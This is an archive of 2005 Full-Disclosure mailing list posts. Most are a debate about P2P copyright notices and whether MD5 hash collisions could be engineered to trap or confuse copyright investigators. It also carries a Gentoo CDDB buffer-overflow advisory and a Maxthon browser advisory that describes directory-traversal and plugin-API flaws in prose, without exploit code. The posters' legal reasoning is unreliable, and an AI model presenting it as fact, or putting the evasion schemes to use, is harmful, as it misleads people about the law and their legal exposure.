I think you are missing my point.
AJ C wrote:
> Civil vs Criminal cases dude, you're imposing some aspects of criminal
> cases upon civil proceedings and that's not how they work. In a
> criminal trial it's a dramatized version of reasonable doubt, civil
> proceedings must show 51%+ responsibility on the part of the defendant
> (much, much easier and why the powers that be choose this route). Not
> to mention it's their content (no harm, no foul on downloading
> something they already own)
My point is that all you have to do is provide content they do not own
but do download or attempt to download for this test to fail. Simply the
existence of content with an advertised hash and name that is the same
as other content does not prove they own the content or that it is even
there. The act of downloading the content they think they own but in
fact do not is a violation of the same law they are attempting to get
you with.
There is no combination of the civil and criminal here. I am saying that
the accuser having committed a crime prevents them from bringing civil
suit based on the laws they themselves have violated. If they do bring
suit they are ultimately going to fail while providing all of the
information you need to be successful in a civil case and likely a
criminal case.
> and MPAA/RIAA/blah have set precedence for
> proactively tracking (either themselves or appointed parties)
> file-sharing events (method of access is not unlawful and cannot be
> brought into contention...is BitTorrent inherently illegal when used
> for legit purposes? -- nope).
Correct, you providing your copyrighted content to authorized users is a
fully valid use of the technology. The RIAA downloading that content to
ensure it is not their copyrighted content is a violation of the law.
The case is closed.
>
> If bb knocks on your door then you argue evidentiary process otherwise
> in a civil proceeding you bear more of a burden to show you *didn't*
> do what they're claiming (right or wrong they do have the legal upper
> hand with their records versus essentially a verbal denial at best).
I have the proof in the situation I presented. I have the actual logs
showing that they did in fact download content that was not theirs and
that the information they are presenting to justify the case is in fact
a false representation.
>
> 'Probably just easier to not download the crap and stay off the radar, $0.02.
I don't download the crap, not because it is illegal but because I
believe people should be paid for the work they do. If I do not believe
the work is not worth the price I don't buy it.
I would not be opposed to creating a service that simply advertised
filenames and hashes to the network but did not provide the actual
content just to prove that the approach is both flawed and ultimately
just as illegal.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Valdis.Kletnieksvt.edu
Date: Thu Apr 07 2005 - 23:42:52 CDT
On Thu, 07 Apr 2005 14:52:55 PDT, Mike Owen said:
> As reported over the last few months, MD5 is very broken. MD5
> collisions are very easy to generate, with some reports of as little
> as a few hours needed on reasonable hardware to generate a collision.
There's now a known attack for generating 2 strings that happen to hash
to the same MD5 hash value fairly easily.
The more general problem of generating a second string that hashes to
an already known/fixed MD5 hash is still basically infeasible (unless you're
a very well funded spook agency *and* know something the rest of us don't)...
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001
iD8DBQFCVgvLcC3lWbTT17ARAg/PAJ458cAbOxgPE4WA97TZlFe76zUqdACgglWw
AG1myeW4quQDdtbQAQjhE64=
=/d+U
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
announcementspulltheplug.org
Date: Fri Apr 08 2005 - 00:44:07 CDT
Just reminding people and correcting ourselves
this weekend there is a format strings tutorial by nemo
(nemofelinemenace.org) scheduled at 3:00PM AEST Saturday April 9th
which is 05:00 GMT Saturday April 9th
(GMT will be the norm in the future)
We've gotten a few emails and needed to correct/remind.
http://www.pulltheplug.org/about/suntzu/ for details.
- people at pulltheplug dot org
(who says mailing lists arent addictive)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
class101HAT-SQUAD.com
Date: Fri Apr 08 2005 - 06:00:49 CDT
would be nice to done your crap discussion elsewhere, at start, this thread
shouldnt be there , thx mr coombs ..............................
-------------------------------------------------------------
class101
Jr. Researcher
Hat-Squad.com
-------------------------------------------------------------
----- Original Message -----
From: "AJ C" <spook3y3sgmail.com>
To: "Jason" <securitybrvenik.com>; <full-disclosurelists.grok.org.uk>
Sent: Friday, April 08, 2005 4:48 AM
Subject: Re: [Full-disclosure] Re: Case ID 51560370 - Notice
ofClaimedInfringement
> Civil vs Criminal cases dude, you're imposing some aspects of criminal
> cases upon civil proceedings and that's not how they work. In a
> criminal trial it's a dramatized version of reasonable doubt, civil
> proceedings must show 51%+ responsibility on the part of the defendant
> (much, much easier and why the powers that be choose this route). Not
> to mention it's their content (no harm, no foul on downloading
> something they already own) and MPAA/RIAA/blah have set precedence for
> proactively tracking (either themselves or appointed parties)
> file-sharing events (method of access is not unlawful and cannot be
> brought into contention...is BitTorrent inherently illegal when used
> for legit purposes? -- nope).
>
> If bb knocks on your door then you argue evidentiary process otherwise
> in a civil proceeding you bear more of a burden to show you *didn't*
> do what they're claiming (right or wrong they do have the legal upper
> hand with their records versus essentially a verbal denial at best).
>
> 'Probably just easier to not download the crap and stay off the radar,
$0.02.
>
> On Apr 7, 2005 7:26 PM, Jason <securitybrvenik.com> wrote:
> > IANAL but it seems this thought process is broken.
> >
> > Jason Coombs wrote:
> > > Come on, people, get a clue.
> > >
> > > The copyright owner has authorized the forensic investigators to
> > > download the infringing material. If it was there, according to a
> > > forensic investigator, then you have to prove it was not.
> >
> > This position does not hold water, there is no way for them to not break
> > the same laws they would be attempting to enforce by performing the
> > investigation from a remote location and without a valid search warrant.
> > You do not have to prove that you did not have the content, you only
> > have to prove that you have content that appears very similar to the
> > remote reviewer.
> >
> > If you were to place a copyrighted work of your own there then would
> > they be forced to download it and break the law in order to prove that
> > it was not the other copyright owners property? If they show in the logs
> > as having attempted a download does this make them guilty?
> >
> > It is as simple as creating a server that will return filenames and
> > hashes found on the network but actually provide /dev/random for the
> > download or your copyrighted content with an engineered hash collision.
> >
> > It only takes one case to prevent the civil suit from being filed. To
> > file the suit would be admitting to having broken the law. You cannot
> > bring suit when the basis of the suit is itself illegal activity.
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> --
> AJC
> spook3y3sgmail.com
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Thierry Carrez (koongentoo.org)
Date: Fri Apr 08 2005 - 06:19:59 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200504-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: GnomeVFS, libcdaudio: CDDB response overflow
Date: April 08, 2005
Bugs: #84936
ID: 200504-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
The GnomeVFS and libcdaudio libraries contain a buffer overflow that
can be triggered by a large CDDB response, potentially allowing the
execution of arbitrary code.
Background
==========
GnomeVFS is a filesystem abstraction library for the GNOME desktop
environment. libcdaudio is a multi-platform CD player development
library. They both include code to query CDDB servers to get Audio CD
track titles.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 gnome-base/gnome-vfs < 2.8.4-r1 >= 2.8.4-r1
2 media-libs/libcdaudio < 0.99.10-r1 >= 0.99.10-r1
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------
Description
===========
Joseph VanAndel has discovered a buffer overflow in Grip when
processing large CDDB results (see GLSA 200503-21). The same overflow
is present in GnomeVFS and libcdaudio code.
Impact
======
A malicious CDDB server could cause applications making use of GnomeVFS
or libcdaudio libraries to crash, potentially allowing the execution of
arbitrary code with the privileges of the user running the application.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All GnomeVFS users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=gnome-base/gnome-vfs-2.8.4-r1"
All libcdaudio users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libcdaudio-0.99.10-r1"
References
==========
[ 1 ] CAN-2005-0706
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0706
[ 2 ] GLSA 200503-21
http://www.gentoo.org/security/en/glsa/glsa-200503-21.xml
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200504-07.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Thierry Carrez (koongentoo.org)
Date: Fri Apr 08 2005 - 06:19:59 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200504-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: GnomeVFS, libcdaudio: CDDB response overflow
Date: April 08, 2005
Bugs: #84936
ID: 200504-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
The GnomeVFS and libcdaudio libraries contain a buffer overflow that
can be triggered by a large CDDB response, potentially allowing the
execution of arbitrary code.
Background
==========
GnomeVFS is a filesystem abstraction library for the GNOME desktop
environment. libcdaudio is a multi-platform CD player development
library. They both include code to query CDDB servers to get Audio CD
track titles.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 gnome-base/gnome-vfs < 2.8.4-r1 >= 2.8.4-r1
2 media-libs/libcdaudio < 0.99.10-r1 >= 0.99.10-r1
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------
Description
===========
Joseph VanAndel has discovered a buffer overflow in Grip when
processing large CDDB results (see GLSA 200503-21). The same overflow
is present in GnomeVFS and libcdaudio code.
Impact
======
A malicious CDDB server could cause applications making use of GnomeVFS
or libcdaudio libraries to crash, potentially allowing the execution of
arbitrary code with the privileges of the user running the application.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All GnomeVFS users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=gnome-base/gnome-vfs-2.8.4-r1"
All libcdaudio users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libcdaudio-0.99.10-r1"
References
==========
[ 1 ] CAN-2005-0706
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0706
[ 2 ] GLSA 200503-21
http://www.gentoo.org/security/en/glsa/glsa-200503-21.xml
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200504-07.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
--
gentoo-announcegentoo.org mailing list
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
gentoo-announcegentoo.org mailing list
From: Michael Holstein (michael.holsteincsuohio.edu)
Date: Fri Apr 08 2005 - 08:31:57 CDT
>>That's why if you wanted, you could sell bags of flour as cocaine and not be
>>charged with drug dealing. Fine, it looks the same and weighs the same,
>>however it isn't the product that's illegal. And to prove that it's illegal,
>>they need to test it.
Well ... tell that to these idiots :
http://www.cleveland.com/search/index.ssf?/base/news/111269368272792.xml?nohio
~Mike.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: buford.t.pisser (buford.t.pisserverizon.net)
Date: Fri Apr 08 2005 - 09:04:50 CDT
Michael Holstein wrote:
>
>>> That's why if you wanted, you could sell bags of flour as cocaine
>>> and not be
>>> charged with drug dealing. Fine, it looks the same and weighs the same,
>>> however it isn't the product that's illegal. And to prove that it's
>>> illegal,
>>> they need to test it.
>>
>
> Well ... tell that to these idiots :
>
> http://www.cleveland.com/search/index.ssf?/base/news/111269368272792.xml?nohio
>
>
>
> ~Mike.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Yes but there was actually coke in all of the mess. I guess that if they
say that just because there were ones and zero's in the file that they
downloaded, then they may be able to bust Jason on that level. Highly
unlikely. Whatever happen to innocent until PROVEN guilty. Why does he
have to prove his innocence. Let them prove his guilt.
Marvin R. Myers CISSP
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Aviv Raff (avivragmail.com)
Date: Fri Apr 08 2005 - 11:08:11 CDT
Maxthon browser multiple vulnerabilities advisory
URL: http://www.raffon.net/advisories/maxthon/multvulns.html
Date: April 08, 2005
Author: Aviv Raff
Introduction
"Maxthon Internet Browser software is a powerful tabbed browser with a
highly customizable interface. It is based on the Internet Explorer browser
engine..." (From Maxthon website <http://www.maxthon.com/> ).
In order to enhance the user experience, Maxthon uses a model of plug-ins.
Maxthon exposes an API, which allows plug-ins to read/write to files. These
functions allow the plug-ins to perform those operations on any directory in
the running computer. Moreover, In order to call Maxthon's API functions
from a plug-in, a "secure id" must be provided. This id can be easily
fetched, and therefore the API functions can be called from any web site the
user visits.
Technical Details
1) Maxthon's plug-ins use readFile and writeFile API functions to read and
write from/to files on the plug-in's directory. It is possible to read and
write from/to files on any other directory, due to lack of directory
traversal character sequences validation.
2) Maxthon allows calling to API functions only when a "security id" of a
plug-in is provided. The "security id" of a plug-in is auto-generated when a
plug-in is used for the first time in the current Maxthon session. Side bar
plug-ins include the "security id" in a file named "max.src" on the
plug-in's directory. By including this file in a script on a web page, it is
possible to call functions that will read and write to local files, manage
tabs, etc.
A combination of the above vulnerabilities can be exploited to potentially
allow remote code execution.
Tested versions: 1.2.0; 1.2.1
Older versions might also be affected.
Proof of Concept
The following is a local file reading proof of concept.
Default Maxthon installation is assumed, and also that the, installed by
default, M2Bookmark side bar plug-in was already used on the current Maxthon
session.
http://www.raffon.net/advisories/maxthon/nosecidpoc.html
Timetable
27-Mar-2005: Vendor informed.
28-Mar-2005: Vendor confirmed vulnerability.
08-Apr-2005: Vendor published a fixed version.
08-Apr-2005: Public disclosure.
Solution
Upgrade to version 1.2.2.
Disclaimer: The information in this advisory and any of its demonstrations
is provided "as is" without warranty of any kind.
-- Copyright C 2005 Aviv Raff. --
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: bkfsec (bkfsecsdf.lonestar.org)
Date: Fri Apr 08 2005 - 10:20:41 CDT
Thomas Sutpen wrote:
>On Apr 5, 2005 5:01 AM, Ag. System Administrator <sysadminagent.co.il> wrote:
>
>
>>More nice will be if this .iso file is just 451,486k of /dev/random junk.
>>Any proves that this file __IS__ Sybase Powerbuilder 9 Enterprise.iso?
>>MD5? Something?
>>
>>
>
>The question that would begged to be asked is how they verified it.
>If they were to download copyrighted software from somebody sharing
>copyrighted software, does this not also constitute a crime? Is it
>not true that downloading illegally shared software is itself illegal?
> I'm not a lawyer, of course, but it's been my observation that the
>legal system doesn't often smile on those breaking the law to prove
>that others are breaking the law, unless it's in a Hollywood movie, no
>pun intended.
>
>Perhaps copyright makes some sort of concession for this. But it
>makes one wonder...
>
>
>
It's not illegal if you're either the original copyright holder, or are
provided a license by the original copyright holder.
It's also really the act of distribution that is the "crime" (ahem, it's
actually a tort violation)...
-Barry
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: bkfsec (bkfsecsdf.lonestar.org)
Date: Fri Apr 08 2005 - 10:25:25 CDT
Randall Perry wrote:
> No, it isn't quiet that clean.
> The initial post was regarding eDonkey/eMule client.
> The files are broken into chunks.
> The files are 'verified' by a one-way hash.
>
Which brings up another couple of questions:
1. Some networks of this type distribute their seeds in random
caches amongst their population. If you don't know it's there, are you
liable for it?
2. For a copyright violation to occur, you need a "significant
portion of the original work." Does having a chunk that qualifies as
1/30th of a copyrighted work
qualify for copyright violation via unauthorized
distribution? I don't know and IANAL, but I'd say that it's questionable.
-Barry
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: bkfsec (bkfsecsdf.lonestar.org)
Date: Fri Apr 08 2005 - 10:30:40 CDT
Thierry Zoller wrote:
>RP> Otherwise, it is _possible_ to have a chunk with the same fingerprint and
>RP> make it appear that you have said chunk of their iso.
>That's *AFAIK* not possible, if this would be true the edonckey/emule
>protocol would have a big design flaw and poeple couldn't even trade
>millions of files every day, some (most?) downloads would be corrutped
>as they could have potentialy downloaded a wrong chunk which in fact
>is from another file.
>
>
>
Of course it's possible. All hashes, by their very nature, have
collisions. The only way to have a truly unique identifier is to use
the actual content of the file (or chunk) itself. The minute you
distill the content down to a hash, you're guaranteeing that collisions
will occur.
They are, however, somewhat rare. That's why the system works as
relatively well as it does.
Regarding corrupt files via P2P protocols... no file transfered via P2P
has _ever_ tranferred bad data and wound up corrupt, right? :)
/friendly sarcasm.
-Barry
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: bkfsec (bkfsecsdf.lonestar.org)
Date: Fri Apr 08 2005 - 10:34:12 CDT
Thierry Zoller wrote:
>You forget that the hash is not the only unique thing that specific file
>has in common with the pirated file/material.
>
>Calculate the following probability:
>
>- The file/chunck has the same MD5 (or whatever HASH)
> as the pirated material in question.
>- The file has the EXACT same filename (if there would be a collission
>how is the probability in mathametic terms that the file the
>collission takes place has the exact same filename?)
>- The file has the EXACT same size (The file has the EXACT same date
>etc.pp)
>
>
>
>
These factors do not come into play when you're talking about P2P
protocols that use seeded chunks to share their files. When a
particular file is split up into chunks and each chunk is appropriately
named on the host, the file itself (depending on the P2P protocol)
doesn't always harbor a descriptive name. The name of the file is
stored in the protocol and file names/dates can very well be different.
These aren't the same issues as verifying a filesystem that you
control. It's a lot more complex than that.
-Barry
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: bkfsec (bkfsecsdf.lonestar.org)
Date: Fri Apr 08 2005 - 11:07:08 CDT
Jason wrote:
>
> My point is that all you have to do is provide content they do not own
> but do download or attempt to download for this test to fail. Simply
> the existence of content with an advertised hash and name that is the
> same as other content does not prove they own the content or that it
> is even there. The act of downloading the content they think they own
> but in fact do not is a violation of the same law they are attempting
> to get you with.
>
Interesting.
I like that idea.
Craft a file with the same hash, time+date stamp and size, and be sure
to include a program and license disclosure for a program that you
wrote. Do something to gain the attention of the BSA, share the file,
and when they download it, sue them for copyright violation, demanding
royalties for the software they possess.
Now, there's a rub: putting the file up on a P2P network could be
considered willful distribution and, as such, could invalidate the
claim. However, misconfiguring your software might get you around that.
You might still lose for a number of reasons, not the least of which is
that on a good day, the courts are supposed to mediate these issues, not
award damages by default... and on a bad day the court just becomes a
tool of corporate assault on the consumer. Let's face it, lately the
courts and legislature (not to mention the executive) have been more
favorable to big business than to consumers and small-time producers.
-Barry
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Valdis.Kletnieksvt.edu
Date: Fri Apr 08 2005 - 11:23:07 CDT
On Fri, 08 Apr 2005 12:07:08 EDT, bkfsec said:
> Craft a file with the same hash, time+date stamp and size, and be sure
> to include a program and license disclosure for a program that you
> wrote.
Unfortunately, nobody has a good algorithm for creating a file that has the
same MD5 hash as a given existing file. So while I *can* create two files
"foo1" and "foo2" that happen to have the same hash (the actual value of which
I have no control over), I can't (yet) create a file that has the same MD5 hash
as the trailer for the next Star Wars movie...
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001
iD8DBQFCVq/rcC3lWbTT17ARAumbAJsE8YZumY9Bu1YweL6Xvj6ejfEsbACfZ/4f
7nzO/J1Vv5HIdeEUhtBStxE=
=RXm3
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
auto447062hushmail.com
Date: Fri Apr 08 2005 - 10:57:37 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
>all the MSN Messngers and MSN Plus are vulnerable.
>
>NOTE: successful exploitation requires that a user has logged in
recently...
PW cached recently? %^)
BS"D, tivdok od paam.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkJWrHAACgkQz4daOG7hUOnOIACfSfrLJfopMrA0Vq/dfFwUeGDHbR4A
n3bTULupIFEnEdQjnQbSdlca6ySS
=uOTp
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434
Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: dk (dkpwarchitects.com)
Date: Fri Apr 08 2005 - 11:47:50 CDT
Valdis.Kletnieksvt.edu wrote:
> On Fri, 08 Apr 2005 12:07:08 EDT, bkfsec said:
>
>
>>Craft a file with the same hash, time+date stamp and size, and be sure
>>to include a program and license disclosure for a program that you
>>wrote.
>
>
> Unfortunately, nobody has a good algorithm for creating a file that has the
> same MD5 hash as a given existing file. So while I *can* create two files
> "foo1" and "foo2" that happen to have the same hash (the actual value of which
> I have no control over), I can't (yet) create a file that has the same MD5 hash
> as the trailer for the next Star Wars movie...
Modding the p2p app to falsely match specific remote chunks against
crafted local files seems an easier route than trying to find
collisions. :) Then again, it would break the swarming feature of what
ever app you modded & 'prolly be breaking some other U.S. Law.
--
dk
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason (securitybrvenik.com)
Date: Fri Apr 08 2005 - 11:50:24 CDT
Valdis.Kletnieksvt.edu wrote:
> On Fri, 08 Apr 2005 12:07:08 EDT, bkfsec said:
>
>
>>Craft a file with the same hash, time+date stamp and size, and be sure
>>to include a program and license disclosure for a program that you
>>wrote.
>
>
> Unfortunately, nobody has a good algorithm for creating a file that has the
> same MD5 hash as a given existing file. So while I *can* create two files
> "foo1" and "foo2" that happen to have the same hash (the actual value of which
> I have no control over), I can't (yet) create a file that has the same MD5 hash
> as the trailer for the next Star Wars movie...
>
I think that entirely depends on the format the file is distributed in.
You could take a zipfile and pad it in non critical areas to change the
MD5 without creating a substantial difference in the deliverable
content. You could do the same with gzip or bzip formatted files. You
could also pad any embedded jpeg images to engineer a collision. There
are quite a few opportunities where this method could be used to twiddle
the new MD5 without materially changing the content.
Here is the case I am thinking about.
Software that is ~150M in size, it gets redistributed as a new file that
is 160M is size but has a collision with your software which is also
160M in size. I imagine there would be some computational time involved
to find the appropriate collision but a lot less computational time than
finding a perfect match to the original.
Now everyone must download both files to know for sure that there is a
violation, in performing this download they are violating the law
themselves. I doubt you would be awarded any royalties as a result of
this but it would take all of the meat out of further prosecution
efforts since they would have to be able to prove they did not violate
the law and in fact downloaded only the correct version.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Valdis.Kletnieksvt.edu
Date: Fri Apr 08 2005 - 12:20:08 CDT
On Fri, 08 Apr 2005 12:50:24 EDT, Jason said:
> I think that entirely depends on the format the file is distributed in.
> You could take a zipfile and pad it in non critical areas to change the
> MD5 without creating a substantial difference in the deliverable
> content. You could do the same with gzip or bzip formatted files. You
> could also pad any embedded jpeg images to engineer a collision. There
> are quite a few opportunities where this method could be used to twiddle
> the new MD5 without materially changing the content.
It's easy to tweak a file and get a different MD5. That's why Tripwire works.
> Software that is ~150M in size, it gets redistributed as a new file that
> is 160M is size but has a collision with your software which is also
> 160M in size. I imagine there would be some computational time involved
> to find the appropriate collision but a lot less computational time than
> finding a perfect match to the original.
You're missing the point.
Let's say we have a file A that's 150M in size, and a file B that's 160M in
size. File B is *not* under our control, and has a known fixed MD5 hash.
It's easy to take file A, and create 2 files C and D from it that happen to
have the same MD5 hash as each other. What is *NOT* easy is creating a file E
that has the same hash as A or B.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001
iD8DBQFCVr1HcC3lWbTT17ARAiOBAKD9r62CNz3pRM29E3Llkqfa0wlXUQCfWBwB
xr7YPUC07hUT22557K+tjP0=
=VPm/
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
From: Jason (securitybrvenik.com)
Date: Fri Apr 08 2005 - 12:45:51 CDT
Valdis.Kletnieksvt.edu wrote:
> On Fri, 08 Apr 2005 12:50:24 EDT, Jason said:
>
>
>>I think that entirely depends on the format the file is distributed in.
>>You could take a zipfile and pad it in non critical areas to change the
>>MD5 without creating a substantial difference in the deliverable
>>content. You could do the same with gzip or bzip formatted files. You
>>could also pad any embedded jpeg images to engineer a collision. There
>>are quite a few opportunities where this method could be used to twiddle
>>the new MD5 without materially changing the content.
>
>
> It's easy to tweak a file and get a different MD5. That's why Tripwire works.
>
>
>>Software that is ~150M in size, it gets redistributed as a new file that
>>is 160M is size but has a collision with your software which is also
>>160M in size. I imagine there would be some computational time involved
>>to find the appropriate collision but a lot less computational time than
>>finding a perfect match to the original.
>
>
> You're missing the point.
>
> Let's say we have a file A that's 150M in size, and a file B that's 160M in
> size. File B is *not* under our control, and has a known fixed MD5 hash.
>
> It's easy to take file A, and create 2 files C and D from it that happen to
> have the same MD5 hash as each other. What is *NOT* easy is creating a file E
> that has the same hash as A or B.
I get the point just fine. Injecting files C and D results in a
situation that cannot be resolved without downloading both files.
Song A = mp3 format file with valid license to BSA
Song B = mp3 format file without valid license to BSA
Song C = zip of Song A plus pad to generate MD5
Song D = zip of Song B plus pad to generate same MD5
It is now impossible to distinguish between C and D without downloading
both. The content inside is still fully usable and valid but a violation
cannot be confirmed without yourself violating the law.
What you might see in a DL dialog
NAME MD5 SIZE
somefile.zip ABCD321312 120M
someotherfile.zip ABCD321312 120M
You cannot remotely know that either file is in fact the content you are
looking for without downloading both files. Both files may not be the
content you are looking for. How can you remotely distinguish that a
violation has occurred?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Valdis.Kletnieksvt.edu
Date: Fri Apr 08 2005 - 13:53:31 CDT
On Fri, 08 Apr 2005 13:45:51 EDT, Jason said:
> I get the point just fine. Injecting files C and D results in a
> situation that cannot be resolved without downloading both files.
>
> Song A = mp3 format file with valid license to BSA
> Song B = mp3 format file without valid license to BSA
> Song C = zip of Song A plus pad to generate MD5
> Song D = zip of Song B plus pad to generate same MD5
>
> It is now impossible to distinguish between C and D without downloading
> both. The content inside is still fully usable and valid but a violation
> cannot be confirmed without yourself violating the law.
On the other hand, note the following:
1) The copyright nazi's aren't going to be looking for C *or* D, because they're
only looking for files that have the same hash as A. They'd have to actually
download C and D and *listen* to it, and identify it (quick - how do you tell
the difference between the audio content of the original Beatles "Come Together"
and the Aerosmith cover of the same song?)
2) It's of course simple to create an arms race where the copyright nazis need to
expend more effort because they can't just go after the MD5 sum. However, it cuts
both ways - if you see 15 copies of a file available with the same MD5 sum, you can
have *some* trust it's not corrupted. If you see 15 copies with 15 different hashes,
which one do you trust?
3) If you change the size, date, and MD5 hash and rename it to "Frozzle-bar.doc",
you're not likely to get a note from Metallica's representative about the
pirated copy of their album. But it's probably not going to be accessed very
much unless you re-rename it to Frozzle-bar-really-metallica-master-of-puppets.doc.
Of course, at that point, you *may* get a note from their representative.. :)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001
iD8DBQFCVtMqcC3lWbTT17ARAgWuAKDrsZCQqpB2bUxvBwbZEgK5C+5TTACeOA7W
YVCP72lx81V9qCAHtK4WFLQ=
=9cT4
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
